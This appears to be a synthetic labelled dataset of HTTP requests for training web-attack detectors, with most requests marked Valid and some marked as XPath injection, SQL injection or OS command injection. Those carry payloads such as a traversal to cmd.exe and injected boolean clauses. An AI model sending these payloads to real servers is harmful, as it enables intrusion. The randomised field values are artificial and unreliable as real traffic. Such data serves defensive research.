Accept-Charset: koi8;q=0.9, euc-kr, x-mac-ce
Accept-Language: *
Cache-Control: only-if-cached
Cookie: ty5zhTnymOtN=xTaibt aqEpniOa
Date: Sat, 12 Aug 06 16:34:34 UTC
ETag: "ACkBovqa6jw8LirvL7J7"
Expect: aebinisw
If-Modified-Since: Mon, 25 Jun 07 10:49:35 UTC
If-Unmodified-Since: Sat, 23 Sep 06 17:23:21 GMT
If-Match: *
If-Range: "Ju2T-C_wLoUC3i0"
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic cjdlYWk6ZWkwYzdB
Referer: http://www.etahlyn.org/lettoasw/ecenioh9/elarj/aVaa3ah.nsf
Trailer: Via
User-Agent: 9zBzN2-K0 http://www.snmn.net
Via: 0.6 103.41.66.26
Warning: 670 90.192.133.231 "telxe" 
----: -----------------------------

null

End - Id: 35019
Start - Id: 48498
class: XPathInjection
PUT /t8rsoYl7ieeebpram/nTbzr2tJudfT@UFyl7/xuH@5y/oxYI0b/tVb9dpKc4O/ojeal/o3UtX3eR0O.php4? HTTP/1.1
Content-Length: 147
Content-Language: silsN,hexoet5
Content-Encoding: deflate
Content-Location: http://ldstoq.be/r2bw/emhd/4sindmdC/eeO4ece/iaet.jpeg
Content-MD5: YXhodEhhcGYzb25hZWU5RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jan 08 17:34:27 CET
Last-Modified: Sun, 23 Apr 06 02:18:15 CET
Host: www.ssfs6tE.net
Connection: rxuln1je
Accept: */*
Accept-Charset: iso-8859-1, macintosh;q=0.5, koi8;q=0.8, iso-8859-8-i
Accept-Encoding: *;q=0.5
Accept-Language: oasdn-Sfilano, enig-ariIio;q=0.0, cMoPb-o6ootw, lhEeoRrt-n
Cache-Control: max-stale=1
Client-ip: 186.162.234.129
Cookie2: $Version="932"
Date: Tue, 17 Feb 04 21:15:53 GMT
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: 9sb4l
From: numhoTo@rsni1ore.com
If-Modified-Since: Fri, 21 Jul 06 11:28:34 GMT
If-Unmodified-Since: Mon, 02 Jul 07 23:15:02 UTC
If-Match: *
If-None-Match: "Z989yHaJOyFT2C5a99i@"
If-Range: Wed, 30 Sep 09 12:34:24 GMT
Max-Forwards: 744
Authorization: NTLM ZW5hZmVlbm9yYU9mbXNuZ256M1llZTRvSml6dG9GcjZpcHh0c2VDb3l0bg==
Referer: /aeagafeA/3vas/sleoeA/ec5ea.mdb
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/4.0 (Machintosh; U; Mac OS X 2.4; yh-tn; rv:7.6.0) Gecko/01546978
Via: HTTP/7.4 175.165.211.190, HTTP/4.4 219.235.61.30
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -----------------------------

4irw=71  or    1<     se/lndoeg/itr/child::text()[position()=3]     or     43319='] | /* | /foo[bar='

End - Id: 48498
Start - Id: 11421
class: Valid
GET /platdEska/taeitmotwyt/rTJ7@iku/ngroup by/mCr8YfAhtbIbR/aitoeaeruneie/qbHIBUe9W12AZPm/4Jtt61iAXwa.gif? HTTP/1.1
Host: www.urleb.gov
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t7creb-c;q=0.1
Cache-Control: max-stale=845
Client-ip: 148.233.33.178
Cookie: t9biurriStiste=ri sh%uo;7yna8l1rn=aaine;3p_A0INinclude9ITr=i;nnttdocmatW=bodyNcmjvoceRo=mocharlinki;te3E1=107105;xncte=e5dsenn
Cookie2: $Version="405"
Date: Mon, 06 Feb 06 10:49:20 UTC
ETag: "yX9Em7sifjKXLAVjnj"
Expect: msWdr5l=cetnxz3t;stme5
From: iElwxs5p@8am8xdh.it
If-Modified-Since: Wed, 17 Mar 04 04:50:19 UTC
If-Unmodified-Since: Tue, 05 May 09 23:43:36 GMT
If-Match: *
If-None-Match: "Jg8uqrrgQVX5rLi5wET"
If-Range: Wed, 17 Sep 08 21:13:21 GMT
Max-Forwards: 367
MIME-Version: 4.6
Pragma: neM='ent'
Proxy-Authorization: Basic emh0UjpkeXN0ZWw=
Authorization: Digest algorithm=Hhilmp
Range: -926,-79,285463-509
Referer: http://ttnnsrS.de/tooamb/amdemnrb/3tbgte/trlo/giatsa.mp3
TE: trailers
Trailer: Referer
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 2.0; e1-kg; rv:0.6.7) Gecko/49810881
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 078x9567
Via: 2.6 186.193.157.153
Transfer-Encoding: ayos
Upgrade: mee/7.7, coi/1.5, plalfl/9.5, 1ocfo/7.9, tsoiin/2.5
Warning: 573 90.107.83.182:9973 "lttoC2rteccnokatt" "Tue, 21 Apr 09 10:53:32 CET"
X-Forwarded-For: 24.107.212.67
X-Serial-Number: 550681
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11421
Start - Id: 15685
class: Valid
GET /dtesxe5mHeem/tJ7gA/5iezgjehrghtnAtx1N/aeebpey.asp?nvd5reotyis=adloHny&t6=E%40&gus2rrwherioc=o&2qrrOhq=y%28&lsrAwwjgajl=cl8hosESPuahEldor&ins7Eyrlona=05&IUI3M=8666&7resreiSowag0dh=cyir&revnd1u=229151&ioonuhs=h%7Ce&ffal=7479 HTTP/1.0
Host: 1.90.157.199:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-icelandic, iso-8859-5;q=0.3, x-mac-korean, iso-8859-7
Accept-Encoding: deflate, gzip;q=0.8, gzip;q=0.6, deflate;q=0.3, identity
Accept-Language: *;q=0.5
Cache-Control: a=Ntnty
Client-ip: 61.17.223.6
Cookie: ssaoo5trmt=s@Yh2@G6
Cookie2: $Version="322"
Date: Mon, 10 Sep 07 13:30:48 GMT
ETag: "MYki.uof4Jf1o_crx"
Expect: adapRas=stI4
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Sat, 20 Mar 04 24:10:40 CET
If-Unmodified-Since: Wed, 18 Aug 04 15:48:00 CET
If-Match: "7HcPy4PASNQeOzbb2Qt"
If-None-Match: "MGeBJuZlf1HFKJ82"
If-Range: Wed, 08 Nov 06 19:21:46 GMT
Max-Forwards: 1
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: dtsewm peesp=dtehnigo
Authorization: NTLM YUVzaW9yaXRsVGR0YWVnRW94ZW0xbnhYcndkcmhzYW5pdG5ndGw=
Range: 3-,7482-,845238-
Referer: http://www.lalnine.ch/fdor/idIEorn1/i7iekhi.pdf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: neuLi/9.9.6
UA-CPU: StrongARM
UA-Disp: 9331,266,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2296x8201
Via: HTTP/9.6 186.37.3.8
Transfer-Encoding: compress
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 483 www.blypln.jpg "tisraoleeohss" 
X-Forwarded-For: 23.70.171.229
X-Serial-Number: 4254681
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 15685
Start - Id: 44170
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.aog5a7sa.net
Connection: keep-alive
Accept: image/gif, application/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=321
Client-ip: 21.12.224.178
Cookie: tmeta50document4G-6=pix_pxXbLf-;dVWmLPwB=3897805590;meiDtaw=)
Cookie2: $Version="0"
Date: Fri, 15 Jan 10 05:28:20 GMT
ETag: W/"aTOdrmXsUZHyRCr-F"
Expect: d5etln=atx6G
From: ejtot@nhhlptpni.net
If-Modified-Since: Wed, 16 Apr 08 16:49:15 GMT
If-Unmodified-Since: Mon, 23 Jul 07 03:45:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4163
MIME-Version: 3.5
Pragma: ots='4cruil'
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: e8aie hagD=reidhsdm
Range: 5-,-97,-5
Referer: /h8eoevsl/vh23zinu/vltgu/ydee/ettR.tar
TE: gzip
Trailer: If-None-Match
User-Agent: sKqpKVq8gl http://www.celu.uk
UA-CPU: Sparc
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: s28on/0.7 www.nd6r.jpg, FTP/1.5 13.170.144.160, 4.7 www.Mcdc.html
Transfer-Encoding: gzip
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 195.218.223.142
X-Serial-Number: 386658457153334430
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44170
Start - Id: 30740
class: Valid
GET /O7Rtc/iiwc0Zrapeiea/itebiae.jpg?gestih=658&gsert=8343842 HTTP/1.1
Host: 203.40.208.216:80
Connection: oira
Accept: text/*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.3, compress, gzip, deflate
Accept-Language: *
Cache-Control: max-age=0
Client-ip: 45.133.46.216
Cookie: ysoeonrthnLe=t3yaTtsIEn;u@fOQidNWCxi4=6eVhti1wudmu5w;tck4W3FKetcmx5=t2@GJ;iy8Fyoi=9;0tGqiS=abody|a
Cookie2: $Version="920"
Date: Fri, 08 Feb 08 02:59:58 UTC
ETag: W/"Nlori7f-4M5Q18VjVbI8"
Expect: 100-continue
From: dubt@tmrdi.net
If-Modified-Since: Wed, 19 Apr 06 11:12:27 GMT
If-Unmodified-Since: Sun, 02 Oct 05 12:05:08 GMT
If-Match: "uDl8F.z8aSNFqtMHVl"
If-None-Match: *
If-Range: Wed, 09 Aug 06 17:36:56 UTC
Max-Forwards: 056
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: uwea ht18Lnh=tnrantuh
Authorization: Basic c2NvbjM6b2hlcmhlcg==
Range: 4297-25184
Referer: /yenc/nraoee.sh
TE: gzip
Trailer: If-Modified-Since
User-Agent: isEsveTo/0.8.6
UA-CPU: PowerPC
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2445x5903
Via: 9.9 243.206.182.255
Transfer-Encoding: deflate
Upgrade: uom4/0.1, suMtl/8.8
Warning: 994 www.tuorse.js:74927 "slsp2oatzxr0wEyhOhx" 
X-Forwarded-For: 158.68.127.255
X-Serial-Number: 567820794809201
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30740
Start - Id: 41182
class: SqlInjection
GET /_Q873hSBmmwwm/rpi1eida/sHEUnie5dotcyt4s/naJioi/serwcmn/ente4eo/o_7OF4.uxf/i-Q7RhU/gDx_/v0iT0anode.png?sRn=gud+pwlae%5Dit&nnICBhlds6fcfa=fSp&hzlhDtrdyS=Arirlocationd%3Cnb&kQah7Q=nlhptknxinwo&h6gTsoenn=7%3BmLd&skcovtr=788386325&yiEt4onrnici0a=%7C7&ngtihtynrvndtv=19411&PQmFy=21004&an5gd7fekIgae=25mG_LNHo&vBZyWlXm@_4=ruc8eethnltEhbcvaa&9tern1rAAc42ts=3kb%28-&varFvQj=41707902&Oservices4NE=36193130&2KreplaceeMKR4=xo%5Cv%3FetB%5Betv%2Bn HTTP/1.1
Host: www.whyen17lwo.ch:3407
Connection: ipveaiae
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.4
Accept-Encoding: OrigText'OR'qjhga'  = 'ENys5n'
Accept-Language: *;q=0.6
Cache-Control: min-fresh=471
Client-ip: 94.242.254.161
Cookie: elenoesrdaentt=shfte0titie6co
Cookie2: $Version="4"
Date: Fri, 11 Jan 08 10:13:37 UTC
ETag: "Ub928eM_Vw_6r6WY-jO"
Expect: tywew9ot=neizle3v;cttrefw
From: esDepa4@HdEecIeEdp.uk
If-Modified-Since: Thu, 10 Dec 09 21:59:11 UTC
If-Unmodified-Since: Wed, 24 Feb 10 03:17:40 CET
If-Match: "mM3x9E1hhv3-PCTRZ"
If-None-Match: "Hil-7JmxEhuB4VfDVk"
If-Range: "smDg9PQ15L51C@.nixN_"
Max-Forwards: 7940
MIME-Version: 8.9
Pragma: ica=rieow
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: NTLM aWFtc25FRXJhMGR0YXdvbmVwYWFlcnlzbDZuZWRTaElpT2FOckFzaXQ=
Range: -2,7-111844
Referer: http://dtndahoa.net/hgehr/pbeilna/rhrttOO/iauuuG/ht8ha.png
TE: gzip,chunked,gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 6.8; eo-o2; rv:6.8.7) Gecko/99090220
UA-CPU: PowerPC
UA-Disp: 8221,0714,8
UA-Pixels: 724x926
Via: HTTP/8.5 www.nemdw.tiff
Transfer-Encoding: compress
Upgrade: delaks/6.4, u3ts/7.2, eriEl/2.3, mehun/9.8
Warning: 227 www.Stshs.jpg:5 "e3joeviwaEa" "Wed, 09 Aug 06 10:55:01 CET"
X-Forwarded-For: 112.176.54.6
X-Serial-Number: 800944
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41182
Start - Id: 28837
class: Valid
GET /LrservicesO2Zw0hRCjW/h9jttV-k.JbTiW_SY/eS46zclk/ldlad3rn0eiikol9sh/Twghee5stvcetldsIreg/sj3K4VYhKG/wsERbPM.png?et1iawUi3ins=hevisd8E&SNZS0m9C5Dftp=2m-FUb&2hRe=gGH%40yPdJv3U&aaivU0rldA=ohhc+nd&duemitpjtied=20593111 HTTP/1.1
Host: www.hjqnU.it:136
Connection: iDosROc
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=0668
Client-ip: 184.97.88.137
Cookie: mdz@MPol8fnce=3dr;laia1bu=64ecwx;klaaoboLleNrqsi=ii ;dtaeeuo2aneHtmm=62950713
Cookie2: $Version="77"
Date: Wed, 31 May 06 10:05:57 GMT
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: eahw
From: 4zbw@syof.net
If-Modified-Since: Sun, 15 Oct 06 17:07:56 GMT
If-Unmodified-Since: Sat, 04 Oct 08 11:57:55 GMT
If-Match: *
If-None-Match: *
If-Range: "15LWqv1ag9eXLvTGfJ"
Max-Forwards: 10
MIME-Version: 9.9
Pragma: heemom=morz
Proxy-Authorization: NTLM SW9oZW8yc1RiaU5lRXNzZDNwb3NsZWVzYWNRbWJpZWxkVTR4R2RxaA==
Authorization: Digest realm
Range: 3-,-55290
Referer: /e7l2/o8eaNtsA/dtefa/81yiee.jpeg
TE: trailers,deflate,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.9 (compatible; MSIE 3.4; Open BSD i586; kahiy)
UA-CPU: x86
UA-Disp: 550,6527,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 122x5513
Via: 5.8 www.LterzxcY.css:89, HTTP/3.8 128.13.200.130:81, HTTP/4.6 www.Esahy.css
Transfer-Encoding: deflate
Upgrade: EEoc/3.8, n7isho/5.6, mZTrt/4.3, tisotc/2.6
Warning: 157 www.r3hkaor.js "yoe7ri8dLNtecrho" "Tue, 22 Sep 09 04:37:42 CET"
X-Forwarded-For: 26.164.27.111
X-Serial-Number: 39502
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28837
Start - Id: 32747
class: Valid
POST /ub/hK9/kaneqkt0n/nsIedm7sneng/NapodassnWoc1tdrenl/na3WUgBoDU/ycsdedta6ter9wen/3paPgez/_c4P4rmjYCg8P3/copy4g7u/tEbn04atTV.htm? HTTP/1.0
Content-Length: 14
Content-Language: yrttqNh
Content-Encoding: compress
Content-Location: /ernnsin/damm/eleoHtse.jpeg
Content-MD5: UmVJMzBUZHJ0emYydGh0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Apr 08 04:40:05 UTC
Last-Modified: Wed, 28 Jul 04 13:16:22 GMT
Host: 168.88.138.5
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: bmxdrxl-yhuEonZ, tfdq-gt;q=0.0
Cache-Control: min-fresh=751
Client-ip: 33.225.104.136
Cookie: teyyiA=ze;KgKreplaceeX=s;DmUtmpd=esescO;ciajnnu9=sIi1OQSVSrjN;dhsneure=inqev4Z;hrvfaeie8uuog0=phV
Cookie2: $Version="20"
Date: Sat, 24 Jun 06 06:10:49 GMT
ETag: "KQmvMjy@tItzccQF"
Expect: 100-continue
From: ynuuOeYe@e4oe.com
If-Modified-Since: Thu, 18 May 06 23:39:58 CET
If-Unmodified-Since: Mon, 05 Apr 04 15:18:14 CET
If-Match: *
If-None-Match: "QEBPnaaNjuuHaUXM@"
If-Range: "2BAgpY4XBIDrf262uvqF"
Max-Forwards: 0743
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest qop=igkvtyr
Authorization: eT4oey 1cHstn=osEaI
Range: -0
Referer: /aets/2fp2e/rhthNeF/ib6y3y2/oaId6y.swf
TE: trailers
Trailer: Date
User-Agent: Y4we/2.5.0
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1032x4856
Via: FTP/3.2 www.mkIaes.png, 2.7 231.206.184.11
Transfer-Encoding: deflate
Upgrade: ndu/3.8
Warning: 309 2.67.53.162:35 "k3rxAc0rieoX" 
X-Forwarded-For: 140.43.85.187
X-Serial-Number: 419486825126
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ycU0=d6VghwA9j

End - Id: 32747
Start - Id: 3626
class: Valid
GET /dlcp5oxeoyl/eVI/YUnceQ/t@S9lSoR6QXtu/D4goactolei6otishs/e0l7BVaTht8mzc@uuXtE/dtbadrst6mDxoic.jpeg? HTTP/1.0
Host: www.npidElld8.biz
Connection: close
Accept: image/gif, text/*;q=0.5, text/*
Accept-Charset: x-mac-cyrillic;q=0.7, cp-950
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: sAc9So=le
Client-ip: 247.34.126.105
Cookie: IkekodIwst=oat htes< eousrt5i;ciamoeoegwveae=ntc9ea;5Wxix=<a~xlus
Cookie2: $Version="387"
Date: Sun, 13 Jan 08 08:26:10 GMT
ETag: W/"8wNwJwg8pPZwh0Vq"
Expect: ttbs=Iammcyan;ehvTg=Btegrha
From: wunn@neo1eimeb.it
If-Modified-Since: Sun, 01 Mar 09 05:56:17 UTC
If-Unmodified-Since: Sun, 26 Jul 09 22:24:51 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Jan 09 07:40:22 CET
Max-Forwards: 24
MIME-Version: 6.4
Pragma: c0='ssci'
Proxy-Authorization: hgtwia lih5bE=ilsi
Authorization: Basic eXMybmE4bTplb29oaWw=
Range: -66041,943-,-24
Referer: /orngc.php
TE: trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: rot4ars
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 945x5264
Via: 9.6 211.64.149.227
Transfer-Encoding: gzip
Upgrade: decg/1.7
Warning: 124 www.shpete4r.jpg "siet" 
X-Forwarded-For: 59.62.10.231
X-Serial-Number: 98641034
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3626
Start - Id: 17306
class: Valid
GET /srbeoaTit9/hheenncwLaf/roneeCqscso9rennai/rdoan3hrtudePh/ndrb9rmtdAg7iakne0/mdi/eLGxoNh5/pNzNTJ8fA/Ocr/mAM-EItZ/pLeyrlT7txhehg.jsp?Totutnrxdslddo=i4.9Bo&wLB2y6F=bh_5FFmGo&WddTzCTzpJ5e=89953396&nesaec=4521585&aPtcecuuioieyDo=husrr1scmdsx7sat&iframe2vA=zWRBtBLO0&eeei6e=os&BtiulNeo=eescnoln&d5le=wr9bBere4&dR1oaxetO=aguJy9toCh&n6twkn1JSOne=naoba&irxrht=94992&iwe=sEliedFdtho&jh=0&bdIea3eecack=dwi%3Fch2tou HTTP/1.0
Host: 203.66.195.189:80
Connection: gmti8nT
Accept: audio/*;q=0.3, application/postscript, audio/*
Accept-Charset: iso-8859-15;q=0.4, x-mac-korean, windows-1254;q=0.7, hz-gb-2312;q=0.8, cp-950;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: pftarD3w-hp8ac;q=0.0, oe-Rrt
Cache-Control: WamteGt=pzaue
Client-ip: 73.229.13.182
Cookie: 3cabeR=?Tepnull;eaPpbNa=ratggyt49s;inj=dqpaoSEDoAopsaelae
Cookie2: $Version="1"
Date: Tue, 17 Feb 04 21:26:44 GMT
ETag: ".J_WMiVIJEBLG19"
Expect: 100-continue
From: ahipt@bhraulhaa.fr
If-Modified-Since: Thu, 25 Mar 10 01:56:07 CET
If-Unmodified-Since: Mon, 11 Aug 08 20:44:25 CET
If-Match: "aZ5Up1IOwU8g8italkB"
If-None-Match: *
If-Range: Sun, 21 Oct 07 13:58:22 CET
Max-Forwards: 56
MIME-Version: 0.0
Pragma: 7rvlrc='e'
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: eirux knieeo=9h8tlf
Range: -03,4-133137
Referer: /sarww/nota/usidae6m/eaqjaNa7.nsf
TE: deflate,chunked
Trailer: Pragma
User-Agent: afSahsf4tm (tC9VE_jxW; cTAm7XnJ; r-PE3Fo; p84RMa4S; uhZSCiq-_j)
UA-CPU: Sparc
UA-Disp: 8556,725,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0027x5589
Via: 7.8 253.57.49.52, 3.3 www.vdBisnrh.htm
Transfer-Encoding: gzip
Upgrade: ikwg/5.7, sm8ess/6.1
Warning: 113 www.scrt.css "niweICl" 
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 835471798337
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17306
Start - Id: 31159
class: Valid
GET /umeahsLhdnenoeua/h3iMsmvu/rpq/iSqv0v/KOo8varbI9%u/s_node/yEqmd/UwhG/tretGkgIut/ezyadspbs52wrm/LKUx%uvIQroptFGLS.php3?1ft6aesieheaE=%3Foorrdsnph-Ascript%5Ch0opt0%5C1&zrmdey25jhe=d_LSOJxo7H&fI=+scek65tqwp-l&nshacNejemlq=ap&caesanhmn=7495531&tar4eigisiroG=aIpznA9D HTTP/1.0
Host: 231.42.114.209
Connection: sAhsIt
Accept: application/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: hswn-h9rp;q=0.6, hdrI2s1g-ieiel, jc9wtr-ercszEtk, ei7kqlb-nyrvni;q=0.2, q0-kat5ls5
Cache-Control: only-if-cached
Client-ip: 23.174.197.157
Cookie: em=7;sjlsAz=luRJ4DAFiP8m;u_@tS=it
Cookie2: $Version="3"
Date: Fri, 10 Aug 07 05:27:29 UTC
ETag: W/"QeSFptHx1VuP6DTf93a"
Expect: 100-continue
From: rfswrMa@zclaopvei.org
If-Modified-Since: Sat, 31 Jan 04 05:05:21 CET
If-Unmodified-Since: Tue, 24 Feb 09 15:54:18 CET
If-Match: "igJciaQmS00hBl9TS"
If-None-Match: "WTqr6HWcPQ4LIO0zss"
If-Range: *
Max-Forwards: 80
MIME-Version: 4.4
Pragma: te='xhtoe'
Proxy-Authorization: Basic bmlubzpoc3R1RWk5
Authorization: NTLM YWZ0bHpIbjhud2FzUjJ0aGNlbXQyb3N0ZTN0dHlhZWw1Z2w=
Range: 41-,7530-978
Referer: http://aixog.it/heiushd/oGesenn/epuei/stinire.php4
TE: trailers,trailers,chunked
Trailer: Authorization
User-Agent: s41crctel (oGZceJtdM; tMfMfpLP; tfdUvN@2BC; h9kD54ze; o7Ret9lO3)
UA-CPU: StrongARM
UA-Disp: 342,300,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8281x6704
Via: angzts/7.8 199.245.239.158
Transfer-Encoding: deflate
Upgrade: Lr9lei/6.9, imH4t/7.3
Warning: 383 www.hopglae.jpg "ewaw3e4reMl" 
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 1704318559609
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31159
Start - Id: 20904
class: Valid
GET /F./aH7r3S/lvk4I.Ny9BlxCdW@iTiv/7Pdh3o.jsp?dafrsn=Aeerr6m0ts9nstom&9osu1e=854&3ndfce5iSnswua=ifvA&yl0uazoyi=usrhoptCautoexec&Eidh=eisrP&lp4dx=tieval+A%5C HTTP/1.1
Host: 147.158.248.130:3697
Connection: sl0l3e
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ioo0ssLi-sy3;q=0.8, twhrr-wtme
Cache-Control: cns1Nda='pqeedduH'
Client-ip: 133.76.119.188
Cookie: tEo=artexec5eIac8l;fXBB=b</sams=zw;Tepl=dcf6d2ojisrye;9child79L25I9i=28
Cookie2: $Version="53"
Date: Mon, 19 Feb 07 02:05:40 CET
ETag: W/"UCpraVfCtd0pS96L4"
Expect: 100-continue
From: iStt7oha@lc2epd8.cz
If-Modified-Since: Tue, 16 Feb 10 14:56:11 UTC
If-Unmodified-Since: Mon, 15 Aug 05 08:52:43 GMT
If-Match: *
If-None-Match: *
If-Range: "sMwkfz7fN1-J.ZkuGb"
Max-Forwards: 841
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic dGxodXNpYzp0b3VpZWg=
Authorization: Basic aG5zdGk6cWlmU2Fu
Range: 822099-090,811-0
Referer: /Fi58s.tar.gz
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: mHjd4f@O8m http://www.ajMhhlY.com
UA-CPU: 68000
UA-Disp: 743,400,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 2726x7026
Via: 1.3 www.xReioNo.jpg:11774
Transfer-Encoding: identity
Upgrade: neaxe/1.5
Warning: 431 85.173.16.1 "r5mststaned9nnteeeoM" "Sun, 21 Jan 07 21:50:10 GMT"
X-Forwarded-For: 105.130.36.71
X-Serial-Number: 8671982338196
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20904
Start - Id: 11007
class: Valid
GET /0rgropt/be7/widc7nLZopenPEN.html?shwode=samsae+z+hu%2Fatne HTTP/1.0
Host: 169.215.149.141:0
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, identity, deflate;q=0.8, compress;q=0.2, compress;q=0.9
Accept-Language: *
Cache-Control: max-age=25633
Client-ip: 201.77.21.42
Cookie: tWaEibsaIdinte=sel47Aeodta;barisnAnvpr=97524784;8wsetutasbtie=r2CgausDa@J
Cookie2: $Version="17"
Date: Sun, 11 Apr 04 21:09:44 GMT
ETag: W/"PbXJvRGd6SbWLgA2"
Expect: aoitsr=Ai0ma
From: aewoeu@ihehwo.net
If-Modified-Since: Fri, 13 Nov 09 16:25:36 CET
If-Unmodified-Since: Sun, 19 Feb 06 11:53:11 CET
If-Match: *
If-None-Match: "SEXB1EMGZeUo_OkAXm"
If-Range: Sat, 19 Feb 05 19:48:23 CET
Max-Forwards: 0359
MIME-Version: 9.8
Pragma: h43Ymlla='vta'
Proxy-Authorization: ayTqd ipelosnh=nhw7hz
Authorization: Basic Tm5tMHNlb2I6c3doc3RpaQ==
Range: 68-612
Referer: /eeeak/Ntcnf/vn8xeys6/02lone7/h3siu.php3
TE: chunked;q=0.2,chunked,gzip;q=0.2
Trailer: Date
User-Agent: Mozilla/2.2 (Windows; U; WinNT 6.9; 3o-5e; rv:3.8.7) Gecko/80065861
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 124x705
Via: 1.2 www.sodhtsb.jpeg:41, 7.7 243.127.110.33
Transfer-Encoding: identity
Upgrade: lhnj/8.6, tEe/2.7, nte/7.2
Warning: 404 55.233.111.251 "hwzpimntn" 
X-Forwarded-For: 187.124.141.113
X-Serial-Number: 109708230731
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11007
Start - Id: 27822
class: Valid
GET /@4XI4.bin? HTTP/1.1
Host: www.emhfiihah.biz
Connection: M0hegw
Accept: audio/x-wav, audio/*, video/*;q=0.4
Accept-Charset: macintosh;q=0.6, x-mac-chinesesimp, x-mac-ce
Accept-Encoding: 
Accept-Language: Kwmdrht-Gmtu2aln, revtdh-e;q=0.4, teLee7-ne7h8;q=0.3, Deertf-60aptTa;q=0.8, 1dujd-oetge;q=0.0
Cache-Control: no-store
Client-ip: 102.45.50.188
Cookie: TByihNb=1476
Cookie2: $Version="51"
Date: Sat, 17 Oct 09 18:00:56 GMT
ETag: W/"Uqzq_2T@iJjTyO8QE3WH"
Expect: 100-continue
From: iiabNhc@l1tnipt.de
If-Modified-Since: Wed, 14 Nov 07 03:33:16 UTC
If-Unmodified-Since: Wed, 27 Jul 05 18:14:30 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Oct 05 22:45:35 GMT
Max-Forwards: 90
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM bmFoMTFUcmFySWZ1cjNlaGVvdHphZWl1ZXNzaGx0dHNvdHROZVQydGFsYzJlZUU=
Authorization: gL7a Tdtbasw=4EUjtv2
Range: -84,186-,1747-
Referer: /pzhapVNe/nolf6i/eeiub/twddeut/ofpte5.mdb
